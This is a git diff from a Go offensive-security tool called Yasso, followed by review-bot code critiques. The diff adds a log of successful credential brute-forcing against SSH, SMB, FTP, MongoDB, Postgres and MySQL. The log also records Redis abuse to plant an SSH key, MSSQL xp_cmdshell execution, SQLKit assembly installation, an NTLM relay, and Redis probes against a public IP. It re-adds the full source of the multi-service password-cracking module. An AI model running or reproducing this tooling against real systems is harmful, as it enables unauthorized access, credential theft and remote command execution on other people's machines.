192.168.248.219 brute ssh success [root:kali] + +[+] 192.168.248.219 brute ssh success [kali:kali] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:69] [request:345] + +[+] 192.168.248.219 brute ssh success [root:kali] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:69] [request:345] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:69] [request:345] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:2] [pass:2] [request:4] + +[+] 192.168.248.219 brute ssh success [root:kali] + +[+] 192.168.248.219 brute ssh success [kali:kali] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:69] [request:345] + +[+] 192.168.248.219 brute ssh success [root:kali] + +[+] 192.168.248.219 brute ssh success [kali:kali] +[+] Find 192.168.248.219 (ping) +[+] Find 192.168.248.1 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 135 open +[+] 192.168.248.1 139 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.219 21 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.1 445 open +[+] 192.168.248.219 5432 open +[+] 192.168.248.219 22 open +[+] 192.168.248.219 11211 open + +[+] 192.168.248.1 brute smb success [administrator:930517] + +[+] 192.168.248.219 brute ftp success [kali:kali] + +[+] Mongodb 192.168.248.219 unauthorized + +[+] 192.168.248.219 brute mongodb success [admin:123456] + +[+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] + +[+] 192.168.248.219 brute postgres success [admin:admin@123] + +[+] 192.168.248.219 brute ssh success [root:kali] +[+] Memcached 192.168.248.219:11211 unauthorized +[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.23.1 192.168.248.1 192.168.0.3] +[+] 200 http://192.168.248.1:8848 [Node.js] None +[+] Find 192.168.248.219 (ping) +[+] Find 192.168.248.1 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 445 
open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.219 21 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.1 139 open +[+] 192.168.248.219 22 open +[+] 192.168.248.219 11211 open +[+] 192.168.248.219 5432 open + [+] 192.168.248.219 brute ftp success [kali:kali] + [+] Mongodb 192.168.248.219 unauthorized + [+] 192.168.248.219 brute mongodb success [admin:123456] + [+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] + [+] 192.168.248.219 brute ssh success [root:kali] +[+] Memcached 192.168.248.219:11211 unauthorized + [+] 192.168.248.219 brute postgres success [admin:admin@123] +[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.23.1 192.168.248.1 192.168.0.3] +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 445 open +[+] 192.168.248.1 139 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.219 5432 open +[+] 192.168.248.219 11211 open +[+] 192.168.248.219 21 open +[+] 192.168.248.219 22 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.1 3306 open +[+] 192.168.248.1 135 open + [+] 192.168.248.1 brute smb success [administrator:930517] + [+] Mongodb 192.168.248.219 unauthorized + [+] 192.168.248.219 brute mongodb success [admin:123456] + [+] 192.168.248.219 brute postgres success [admin:admin@123] + [+] 192.168.248.1 brute mysql success [root:root] +[+] Memcached 192.168.248.219:11211 unauthorized + [+] 192.168.248.219 brute ftp success [kali:kali] + [+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] +[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1] +[+] 200 http://192.168.248.1:8848 [Node.js] None +flag needs an argument: --rekey +Redis Auth failed dial tcp 192.168.248.1:6379: i/o timeout +Redis Auth failed dial tcp 192.168.248.219:6379: i/o timeout +Redis Auth failed dial tcp 
192.168.248.219:6379: i/o timeout +Redis Auth failed dial tcp 192.168.248.219:6379: i/o timeout + [+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[6105] +[+] Restore the original dbfilename +[+] Write ssh key Success +Redis Auth failed dial tcp 118.178.225.48:6379: i/o timeout +Redis Auth failed dial tcp 118.178.225.48:6379: i/o timeout +Redis Auth failed dial tcp 118.178.225.48:6379: i/o timeout +invalid argument "10" for "--timeout" flag: time: missing unit in duration "10" +Redis Auth failed dial tcp 118.178.225.48:6379: i/o timeout +[*] May be your want use redis extend ? Try to add --rekey or --rebound +flag needs an argument: --rekey + [+] Redis 192.168.248.219:6379 Login Success os:[] path:[] dbfilename:[dump.rdb] pid:[] +[+] Restore the original dbfilename +[+] Write ssh key Success + [+] Redis 192.168.248.219:6379 Login Success os:[] path:[] dbfilename:[dump.rdb] pid:[] +[+] Restore the original dbfilename +[+] Write ssh key Success + [+] Redis 192.168.248.219:6379 Login Success os:[] path:[] dbfilename:[dump.rdb] pid:[] +[+] Restore the original dbfilename +[+] Write ssh key Success + [-] Login ssh failed ssh: no key found + [-] Login ssh failed ssh: handshake failed: ssh: unable to authenticate, attempted methods [none publickey], no supported methods remain + [+] Redis 192.168.248.219:6379 Login Success os:[] path:[] dbfilename:[dump.rdb] pid:[] +[+] Restore the original dbfilename +[+] Write ssh key Success +[+] Execute Method: xp_cmdshell +[+] Command: whoami +nt service\mssqlserver + +[+] ALTER DATABASE master SET TRUSTWORTHY ON +[+] SQLKit ==> WarSQLKit +[+] Import the assembly +[+] Link the assembly to a stored procedure +[+] Install SQLKit successful! 
+[+] Please Use SQL Connect Tools to Execute +[+] WarSQLKit Command Help --kithelp [1,2] +[+] Execute Method: xp_cmdshell +[+] Command: whoami +nt service\mssqlserver + +nt service\mssqlserver + + + +Windows IP 配置 + + +以太网适配器 Ethernet0: + + 连接特定的 DNS 后缀 . . . . . . . : + 本地链接 IPv6 地址. . . . . . . . : fe80::29ae:6020:b5ec:f514%8 + IPv4 地址 . . . . . . . . . . . . : 192.168.248.128 + 子网掩码 . . . . . . . . . . . . : 255.255.255.0 + 默认网关. . . . . . . . . . . . . : 192.168.248.2 + +以太网适配器 以太网: + + 媒体状态 . . . . . . . . . . . . : 媒体已断开连接 + 连接特定的 DNS 后缀 . . . . . . . : + +以太网适配器 蓝牙网络连接: + + 媒体状态 . . . . . . . . . . . . : 媒体已断开连接 + 连接特定的 DNS 后缀 . . . . . . . : + + +flag needs an argument: --kithelp +[!] mssql: “whoami”附近有语法错误。 +[!] mssql: “whoami”附近有语法错误。 +[!] mssql: “whoami”附近有语法错误。 +Token Privilege Adjusted +Starting DCERPC NTLM Relay... +DCOM Started + + +Token Privilege Adjusted +Starting DCERPC NTLM Relay... +DCOM Started + + +[+] SQLKit ==> WarSQLKit +[+] Uninstall SQLKit successful! +[+] ALTER DATABASE master SET TRUSTWORTHY ON +[+] SQLKit ==> SharpSQLKit +[+] Import the assembly +[+] Link the assembly to a stored procedure +[+] Install SQLKit successful! +[+] Please Use SQL Connect Tools to Execute +[+] WarSQLKit Command Help --kithelp [1,2] +[!] mssql: 找不到存储过程 'sp_cmdExec'。 +[+] SQLKit ==> SharpSQLKit +[+] Uninstall SQLKit successful! 
+[+] Execute Method: xp_cmdshell +[+] Command: whoami +nt service\mssqlserver + +[+] Execute Method: ole echo +[+] Command: whoami +nt service\mssqlserver + +[+] Execute Method: ole echo +[+] Command: whoami +nt service\mssqlserver + +Session wait failed Process exited with status 127 + [-] Login ssh failed ssh: handshake failed: ssh: unable to authenticate, attempted methods [none publickey], no supported methods remain + [+] Redis 192.168.248.219:6379 Login Success os:[] path:[] dbfilename:[dump.rdb] pid:[] +[+] Restore the original dbfilename +[+] Write ssh key Success +[+] Execute Method: ole echo +[+] Command: whoami +nt service\mssqlserver + +[+] Execute Method: ole echo +[+] Command: ipconfig + +Windows IP 配置 + + +以太网适配器 Ethernet0: + + 连接特定的 DNS 后缀 . . . . . . . : + 本地链接 IPv6 地址. . . . . . . . : fe80::29ae:6020:b5ec:f514%8 + IPv4 地址 . . . . . . . . . . . . : 192.168.248.128 + 子网掩码 . . . . . . . . . . . . : 255.255.255.0 + 默认网关. . . . . . . . . . . . . : 192.168.248.2 + +以太网适配器 以太网: + + 媒体状态 . . . . . . . . . . . . : 媒体已断开连接 + 连接特定的 DNS 后缀 . . . . . . . : + +以太网适配器 蓝牙网络连接: + + 媒体状态 . . . . . . . . . . . . : 媒体已断开连接 + 连接特定的 DNS 后缀 . . . . . . . 
: + +unknown shorthand flag: 'H' in -H +[+] Find 192.168.248.1 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 139 open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.1 445 open + [+] 192.168.248.1 brute smb success [administrator:930517] +[+] Find 192.168.248.1 (ping) +[+] Find 127.0.0.1:8080 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 139 open +[+] 192.168.248.1 445 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.1 135 open + [+] 192.168.248.1 brute smb success [administrator:930517] +[+] Find 192.168.248.1 (ping) +[+] Find 127.0.0.1:8080 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] Find 127.0.0.1:8080 (ping) +[+] Find 192.168.248.1 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] Find 192.168.248.1 (ping) +[+] Find 127.0.0.1:8080 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 5985 open +[+] 192.168.248.1 139 open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 445 open + [+] 192.168.248.1 brute smb success [administrator:930517] +[+] Find 127.0.0.1:8080 (ping) +[+] Find 192.168.248.1 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 5985 open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 445 open +[+] 192.168.248.1 139 open + [+] 192.168.248.1 brute smb success [administrator:930517] +[+] Find 127.0.0.1:5985 (ping) +[+] Find 192.168.248.1 (ping) +[+] Find 127.0.0.1:445 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 5985 open +[+] 192.168.248.1 139 open +[+] 192.168.248.1 445 open +[+] 192.168.248.1 135 open + [+] 192.168.248.1 brute smb success [administrator:930517] + [+] 127.0.0.1 brute smb success [administrator:930517] +[+] Find 127.0.0.1:5985 (ping) +[+] Find 127.0.0.1:445 (ping) +[+] Find 192.168.248.1 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 127.0.0.1 5985 open +[+] 127.0.0.1 445 open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 445 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.1 139 open + [+] 192.168.248.1 brute smb 
success [administrator:930517]
+ [+] 127.0.0.1 brute smb success [administrator:930517]
+[+] Find 127.0.0.1:5985 (ping)
+[+] Find 127.0.0.1:445 (ping)
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 127.0.0.1 5985 open
+[+] 127.0.0.1 445 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 5985 open
+ [+] 192.168.248.1 brute smb success [administrator:930517]
+ [+] 127.0.0.1 brute smb success [administrator:930517]
\ No newline at end of file
diff --git a/cmd/all.go b/cmd/all.go
index 18e9ee1..7c504b0 100644
--- a/cmd/all.go
+++ b/cmd/all.go
@@ -64,10 +64,10 @@ func allRun(hostString string, portString string, jsonbool bool, runtime int, no
 fmt.Println("----- [Yasso] Start do ping scan -----")
 alive = execute(ips, RunICMP)
 }
- fmt.Println("[Yasoo get alive host] is", len(alive))
+ fmt.Println("[Yasso get alive host] is", len(alive))
 // 做漏洞扫描
 var out []JsonOut
-
+ //TODO:
 if len(alive) > 0 {
 fmt.Println("----- [Yasso] Start do vuln scan -----")
 VulScan(alive, false, true, false) // 做漏洞扫描
diff --git a/cmd/brute.go b/cmd/brute.go
index 629c02e..c40560c 100644
--- a/cmd/brute.go
+++ b/cmd/brute.go
@@ -1,257 +1,257 @@ -package cmd - -import ( - "Yasso/config" - "bufio" - "fmt" - "github.com/panjf2000/ants/v2" - "github.com/spf13/cobra" - "io" - "log" - "math" - "os" - "reflect" - "strings" - "sync" - "time" -) - -// 爆破模块 - -const ( - Clearln = "\r\x1b[2K" -) - -var BruteCmd = &cobra.Command{ - Use: "crack", - Short: "crack module and extend tool", - Run: func(cmd *cobra.Command, args []string) { - cmd.DisableFlagsInUseLine = true - _ = cmd.Help() - }, -} - -func init() { - // 添加全局变量 - BruteCmd.PersistentFlags().StringVarP(&Hosts, "hosts", "H", "", "to crack hosts address or ips.txt path (crack Must)") - BruteCmd.PersistentFlags().IntVar(&BrutePort, "port", 0, "to crack hosts port (if not set use default)") - BruteCmd.PersistentFlags().IntVar(&Runtime, "runtime", 100, "set crack thread number") - BruteCmd.PersistentFlags().BoolVarP(&BruteFlag, "crack", "", false, "make sure to use crack") - BruteCmd.PersistentFlags().DurationVar(&TimeDuration, "timeout", 1*time.Second, "crack module timeout(.eg) 1s (ns,ms,s,m,h)") - BruteCmd.PersistentFlags().StringVar(&PassDic, "pd", "", "pass dic path (.eg) pass.txt") - BruteCmd.PersistentFlags().StringVar(&UserDic, "ud", "", "user dic path (.eg) user.txt") - BruteCmd.PersistentFlags().StringVar(&ProxyHost, "proxy", "", "set socks5 proxy address") - BruteCmd.AddCommand(SshCmd) - BruteCmd.AddCommand(WinRMCmd) - BruteCmd.AddCommand(SmbCmd) - BruteCmd.AddCommand(Log4jCmd) - BruteCmd.AddCommand(RedisCmd) - BruteCmd.AddCommand(RdpCmd) - BruteCmd.AddCommand(MysqlCmd) - BruteCmd.AddCommand(MssqlCmd) - BruteCmd.AddCommand(FtpCmd) - BruteCmd.AddCommand(PostgreCmd) - BruteCmd.AddCommand(MongoCmd) - rootCmd.AddCommand(BruteCmd) -} - -var BurpModule = map[string]interface{}{ - "ssh": SshConnByUser, - "mysql": MySQLConn, - "mssql": MssqlConn, - "redis": RedisAuthConn, - "unredis": RedisUnAuthConn, // redis 未授权 - "postgres": PostgreConn, - "smb": SmbConn, - "ftp": FtpConn, - "rdp": RdpConn, - "winrm": WinRMAuth, - "mongodb": MongoAuth, - 
"unmongodb": MongoUnAuth, // mongodb 未授权 -} - -func BurpCall(EncryptMap map[string]interface{}, name string, params ...interface{}) []reflect.Value { - f := reflect.ValueOf(EncryptMap[name]) // 获取map键位name的值 - if len(params) != f.Type().NumIn() { // 如果参数的值不等于函数所需要的值 - log.Println(fmt.Sprintf("[ERROR] Burp Call Func key name %s is failed", name)) - os.Exit(1) - } - args := make([]reflect.Value, len(params)) - for k, param := range params { - if param == "" || param == 0 { - continue - } - //Println()(param) - args[k] = reflect.ValueOf(param) - } - //Println()(args) - //fmt.Println(args) - return f.Call(args) // 调用函数并返回结果 -} - -func SwitchBurp(service string, users []string, pass []string, hosts []string, port int, thread int, timeout time.Duration, Domain string) { - // 传入的参数均为3个 - // 调用方式 - var tunnel = make(chan string, 20) - var wg sync.WaitGroup - go func() { - for _, ip := range hosts { - tunnel <- ip - } - }() - for i := 0; i < len(hosts); i++ { - wg.Add(1) - _ = ants.Submit(func() { - ip := <-tunnel - burpTask(ip, service, users, pass, port, thread, timeout, Domain, true, false, nil) - wg.Done() - }) - } - wg.Wait() - Println(fmt.Sprintf(Clearln+"[*] brute %s done", service)) - - //Println()(service,users,pass,hosts,port,thread,BurpModule) -} - -/*** -* 从新计算爆破方式,之前的爆破是采用分割user进行的,但是发现,user数量会远少于password,所以按照password进行分割 - */ - -func burpTask(host, service string, users []string, pass []string, port int, thread int, timeout time.Duration, Domain string, run bool, jsonbool bool, out *JsonOut) { - var t int - var wg sync.WaitGroup - if len(pass) <= thread { - t = len(pass) - } else { - // 计算user数量 - t = thread // 协程数量 - } - - num := int(math.Ceil(float64(len(pass)) / float64(thread))) // 每个协程的user数量 - // 分割用户名 - all := map[int][]string{} - for i := 1; i <= t; i++ { - for j := 0; j < num; j++ { - tmp := (i-1)*num + j - if tmp < len(pass) { - all[i] = append(all[i], pass[tmp]) - } - } - } - if run { - go func() { - for { - for _, r := range `-\|/` { - 
fmt.Printf("\r%c brute: wating ... %c", r, r) - time.Sleep(200 * time.Millisecond) - } - } - }() - } - if service == "redis" && run == true { - BurpCall(BurpModule, "unredis", config.HostIn{Host: host, Port: BrutePort, TimeOut: TimeDuration}, "test", "test") - } - if service == "mongodb" && run == true { - BurpCall(BurpModule, "unmongodb", config.HostIn{Host: host, Port: BrutePort, TimeOut: TimeDuration}, "test", "test") - } - //Println()(all,num,t) - for i := 1; i <= t; i++ { - wg.Add(1) - tmp := all[i] - _ = ants.Submit(func() { - for _, p := range tmp { - for _, u := range users { - if strings.Contains(p, "{user}") { - p = strings.ReplaceAll(p, "{user}", p) - } - if u == "" || p == "" { - continue - } else { - result := BurpCall(BurpModule, service, config.HostIn{Host: host, Port: port, TimeOut: time.Duration(timeout), Domain: Domain}, u, p) - burpStatus(result, service, host, Domain, u, p, jsonbool, out) - } - } - } - wg.Done() - }) - } - wg.Wait() -} - -func burpStatus(result []reflect.Value, service, host, domain, user, pass string, jsonbool bool, out *JsonOut) { - var lock sync.Mutex - // 这里是判断类型并返回结果的函数 - if len(result) > 0 { - for _, v := range result { - switch v.Kind() { - case reflect.Bool: - if v.Bool() == true { - if domain != "" { - domain = domain + "\\" - } - if jsonbool == true { - // 加锁 - lock.Lock() - out.WeakPass = append(out.WeakPass, map[string]map[string]string{service: {user: pass}}) - lock.Unlock() - } - Println(fmt.Sprintf(Clearln+`[+] %s brute %s success [%v%s:%s]`, host, service, domain, user, pass)) - } - } - } - } -} - -func Readiness(file *os.File) []string { - var readiness []string /*定义一个空切片用于存储遍历后的数据*/ - buf := bufio.NewReader(file) /*建立一个缓冲区,将文本内容写入缓冲区*/ - for { - data, errR := buf.ReadBytes('\n') /*读取到\n截至*/ - if errR != nil { - if errR == io.EOF { - break - } - return readiness - } - str := strings.TrimSpace(string(data)) - // 修复读取时出现空的导致抛出panic - if str == "" { - continue - } - - readiness = append(readiness, str) 
/*将去除换行符的字符串写入切片*/ - } - return readiness -} - -func ReadTextToDic(service, user, pass string) ([]string, []string) { - var ( - userdic = config.Userdict[service] - passdic = config.Passwords - ) - // 入过不包含.txt的话,按照用户名和密码来算。其中 - if user != "" && !strings.Contains(user, ".txt") { - userdic = strings.Split(user, ",") - } - if pass != "" && !strings.Contains(pass, ".txt") { - passdic = strings.Split(pass, ",") - } - - if user != "" && strings.Contains(user, ".txt") { - userive, err := os.Open(user) - if err != nil { - Println(fmt.Sprintf(Clearln+"[ERROR] Open %s is failed,please check your user dic path", UserDic)) - return []string{}, []string{} - } - userdic = Readiness(userive) - } - if pass != "" && strings.Contains(pass, ".txt") { - passive, err := os.Open(pass) - if err != nil { - Println(fmt.Sprintf(Clearln+"[ERROR] Open %s is failed,please check your pass dic path", PassDic)) - return []string{}, []string{} - } - passdic = Readiness(passive) - } - return userdic, passdic -} +package cmd + +import ( + "Yasso/config" + "bufio" + "fmt" + "github.com/panjf2000/ants/v2" + "github.com/spf13/cobra" + "io" + "log" + "math" + "os" + "reflect" + "strings" + "sync" + "time" +) + +// 爆破模块 + +const ( + Clearln = "\r\x1b[2K" +) + +var BruteCmd = &cobra.Command{ + Use: "crack", + Short: "crack module and extend tool", + Run: func(cmd *cobra.Command, args []string) { + cmd.DisableFlagsInUseLine = true + _ = cmd.Help() + }, +} + +func init() { + // 添加全局变量 + BruteCmd.PersistentFlags().StringVarP(&Hosts, "hosts", "H", "", "to crack hosts address or ips.txt path (crack Must)") + BruteCmd.PersistentFlags().IntVar(&BrutePort, "port", 0, "to crack hosts port (if not set use default)") + BruteCmd.PersistentFlags().IntVar(&Runtime, "runtime", 100, "set crack thread number") + BruteCmd.PersistentFlags().BoolVarP(&BruteFlag, "crack", "", false, "make sure to use crack") + BruteCmd.PersistentFlags().DurationVar(&TimeDuration, "timeout", 1*time.Second, "crack module timeout(.eg) 1s 
(ns,ms,s,m,h)") + BruteCmd.PersistentFlags().StringVar(&PassDic, "pd", "", "pass dic path (.eg) pass.txt") + BruteCmd.PersistentFlags().StringVar(&UserDic, "ud", "", "user dic path (.eg) user.txt") + BruteCmd.PersistentFlags().StringVar(&ProxyHost, "proxy", "", "set socks5 proxy address") + BruteCmd.AddCommand(SshCmd) + BruteCmd.AddCommand(WinRMCmd) + BruteCmd.AddCommand(SmbCmd) + BruteCmd.AddCommand(Log4jCmd) + BruteCmd.AddCommand(RedisCmd) + BruteCmd.AddCommand(RdpCmd) + BruteCmd.AddCommand(MysqlCmd) + BruteCmd.AddCommand(MssqlCmd) + BruteCmd.AddCommand(FtpCmd) + BruteCmd.AddCommand(PostgreCmd) + BruteCmd.AddCommand(MongoCmd) + rootCmd.AddCommand(BruteCmd) +} + +var BurpModule = map[string]interface{}{ + "ssh": SshConnByUser, + "mysql": MySQLConn, + "mssql": MssqlConn, + "redis": RedisAuthConn, + "unredis": RedisUnAuthConn, // redis 未授权 + "postgres": PostgreConn, + "smb": SmbConn, + "ftp": FtpConn, + "rdp": RdpConn, + "winrm": WinRMAuth, + "mongodb": MongoAuth, + "unmongodb": MongoUnAuth, // mongodb 未授权 +} + +func BurpCall(EncryptMap map[string]interface{}, name string, params ...interface{}) []reflect.Value { + f := reflect.ValueOf(EncryptMap[name]) // 获取map键位name的值 + if len(params) != f.Type().NumIn() { // 如果参数的值不等于函数所需要的值 + log.Println(fmt.Sprintf("[ERROR] Burp Call Func key name %s is failed", name)) + os.Exit(1) + } + args := make([]reflect.Value, len(params)) + for k, param := range params { + if param == "" || param == 0 { + continue + } + //Println()(param) + args[k] = reflect.ValueOf(param) + } + //Println()(args) + //fmt.Println(args) + return f.Call(args) // 调用函数并返回结果 +} + +func SwitchBurp(service string, users []string, pass []string, hosts []string, port int, thread int, timeout time.Duration, Domain string) { + // 传入的参数均为3个 + // 调用方式 + var tunnel = make(chan string, 20) + var wg sync.WaitGroup + go func() { + for _, ip := range hosts { + tunnel <- ip + } + }() + for i := 0; i < len(hosts); i++ { + wg.Add(1) + _ = ants.Submit(func() { + ip := 
<-tunnel + burpTask(ip, service, users, pass, port, thread, timeout, Domain, true, false, nil) + wg.Done() + }) + } + wg.Wait() + Println(fmt.Sprintf(Clearln+"[*] brute %s done", service)) + + //Println()(service,users,pass,hosts,port,thread,BurpModule) +} + +/*** +* 从新计算爆破方式,之前的爆破是采用分割user进行的,但是发现,user数量会远少于password,所以按照password进行分割 + */ + +func burpTask(host, service string, users []string, pass []string, port int, thread int, timeout time.Duration, Domain string, run bool, jsonbool bool, out *JsonOut) { + var t int + var wg sync.WaitGroup + if len(pass) <= thread { + t = len(pass) + } else { + // 计算user数量 + t = thread // 协程数量 + } + + num := int(math.Ceil(float64(len(pass)) / float64(thread))) // 每个协程的user数量 + // 分割用户名 + all := map[int][]string{} + for i := 1; i <= t; i++ { + for j := 0; j < num; j++ { + tmp := (i-1)*num + j + if tmp < len(pass) { + all[i] = append(all[i], pass[tmp]) + } + } + } + if run { + go func() { + for { + for _, r := range `-\|/` { + fmt.Printf("\r%c brute: wating ... 
%c", r, r) + time.Sleep(200 * time.Millisecond) + } + } + }() + } + if service == "redis" && run == true { + BurpCall(BurpModule, "unredis", config.HostIn{Host: host, Port: BrutePort, TimeOut: TimeDuration}, "test", "test") + } + if service == "mongodb" && run == true { + BurpCall(BurpModule, "unmongodb", config.HostIn{Host: host, Port: BrutePort, TimeOut: TimeDuration}, "test", "test") + } + //Println()(all,num,t) + for i := 1; i <= t; i++ { + wg.Add(1) + tmp := all[i] + _ = ants.Submit(func() { + for _, p := range tmp { + for _, u := range users { + if strings.Contains(p, "{user}") { + p = strings.ReplaceAll(p, "{user}", p) + } + if u == "" || p == "" { + continue + } else { + result := BurpCall(BurpModule, service, config.HostIn{Host: host, Port: port, TimeOut: time.Duration(timeout), Domain: Domain}, u, p) + burpStatus(result, service, host, Domain, u, p, jsonbool, out) + } + } + } + wg.Done() + }) + } + wg.Wait() +} + +func burpStatus(result []reflect.Value, service, host, domain, user, pass string, jsonbool bool, out *JsonOut) { + var lock sync.Mutex + // 这里是判断类型并返回结果的函数 + if len(result) > 0 { + for _, v := range result { + switch v.Kind() { + case reflect.Bool: + if v.Bool() == true { + if domain != "" { + domain = domain + "\\" + } + if jsonbool == true { + // 加锁 + lock.Lock() + out.WeakPass = append(out.WeakPass, map[string]map[string]string{service: {user: pass}}) + lock.Unlock() + } + Println(fmt.Sprintf(Clearln+`[+] %s brute %s success [%v%s:%s]`, host, service, domain, user, pass)) + } + } + } + } +} + +func Readiness(file *os.File) []string { + var readiness []string /*定义一个空切片用于存储遍历后的数据*/ + buf := bufio.NewReader(file) /*建立一个缓冲区,将文本内容写入缓冲区*/ + for { + data, errR := buf.ReadBytes('\n') /*读取到\n截至*/ + if errR != nil { + if errR == io.EOF { + break + } + return readiness + } + str := strings.TrimSpace(string(data)) + // 修复读取时出现空的导致抛出panic + if str == "" { + continue + } + + readiness = append(readiness, str) /*将去除换行符的字符串写入切片*/ + } + return readiness +} + 
+func ReadTextToDic(service, user, pass string) ([]string, []string) {
+ var (
+ userdic = config.Userdict[service]
+ passdic = config.Passwords
+ )
+ // 如果不包含.txt的话,按照用户名和密码来算。其中
+ if user != "" && !strings.Contains(user, ".txt") {
+ userdic = strings.Split(user, ",")
+ }
+ if pass != "" && !strings.Contains(pass, ".txt") {
+ passdic = strings.Split(pass, ",")
+ }
+
+ if user != "" && strings.Contains(user, ".txt") {
+ userive, err := os.Open(user)
+ if err != nil {
+ Println(fmt.Sprintf(Clearln+"[ERROR] Open %s is failed,please check your user dic path", UserDic))
+ return []string{}, []string{}
+ }
+ userdic = Readiness(userive)
+ }
+ if pass != "" && strings.Contains(pass, ".txt") {
+ passive, err := os.Open(pass)
+ if err != nil {
+ Println(fmt.Sprintf(Clearln+"[ERROR] Open %s is failed,please check your pass dic path", PassDic))
+ return []string{}, []string{}
+ }
+ passdic = Readiness(passive)
+ }
+ return userdic, passdic
+}
diff --git a/cmd/icmp.go b/cmd/icmp.go
index eac0410..c734578 100644
--- a/cmd/icmp.go
+++ b/cmd/icmp.go
@@ -47,13 +47,25 @@ func execute(ips []string, r bool) []string {
 var wg sync.WaitGroup
 // 修改ants池的并发方式
 p, _ := ants.NewPoolWithFunc(len(ips), func(ip interface{}) {
+ var ipt string
 if r == true {
- if icmp(ip.(string)) {
+ // 127.0.0.1:8080格式
+ if strings.Contains(ip.(string), ":") {
+ ipt = strings.Split(ip.(string), ":")[0]
+ } else {
+ ipt = ip.(string)
+ }
+ if icmp(ipt) {
 Println(fmt.Sprintf("[+] Find %v (icmp)", ip))
 Alive = append(Alive, ip.(string))
 }
 } else {
+ if strings.Contains(ip.(string), ":") {
+ ipt = strings.Split(ip.(string), ":")[0]
+ } else {
+ ipt = ip.(string)
+ }
+ if ping(ipt) {
 Println(fmt.Sprintf("[+] Find %v (ping)", ip))
 Alive = append(Alive, ip.(string))
 }
diff --git a/cmd/ps.go b/cmd/ps.go
index cdf246d..bb2b8c8 100644
--- a/cmd/ps.go
+++ b/cmd/ps.go
@@ -6,6 +6,8 @@ import (
 "github.com/spf13/cobra"
 "math"
 "net"
+ "strconv"
+ "strings"
 "sync"
 "time"
 )
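Review bot: In burpTask on the new side, `p = strings.ReplaceAll(p, "{user}", p)` substitutes the password for the `{user}` placeholder instead of the username, and because it overwrites the loop variable the placeholder is consumed on the first user and every later user sees the already-rewritten value; use a fresh local, `cand := strings.ReplaceAll(p, "{user}", u)`, and pass `cand` to BurpCall and burpStatus. The hunk re-adds the whole file and, apart from one comment, its content matches the removed side, so this is pre-existing, but the re-add is the natural place to fix it. burpStatus also declares `var lock sync.Mutex` locally, so each pool goroutine locks its own mutex and the `out.WeakPass` appends are effectively unsynchronized; the mutex needs package scope or a field on JsonOut. ReadTextToDic never closes the files it opens, and its error messages print the `UserDic`/`PassDic` globals rather than the `user`/`pass` arguments it actually tried to open.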
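Review bot: The new host extraction in execute is duplicated verbatim in the `r == true` and `else` branches, and `strings.Split(ip.(string), ":")[0]` yields an empty host for an IPv6 literal such as `::1`; compute it once before the branch with `ipt, _, _ := strings.Cut(ip.(string), ":")`, or, if icmp.go imports net, prefer `net.SplitHostPort` with a fallback to the raw string when it errors. The hunk also keeps `Alive = append(Alive, ip.(string))` inside the pool callback, which runs on pool goroutines, so those appends still race without a mutex around them. execute starts before the hunk and its body continues past it.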
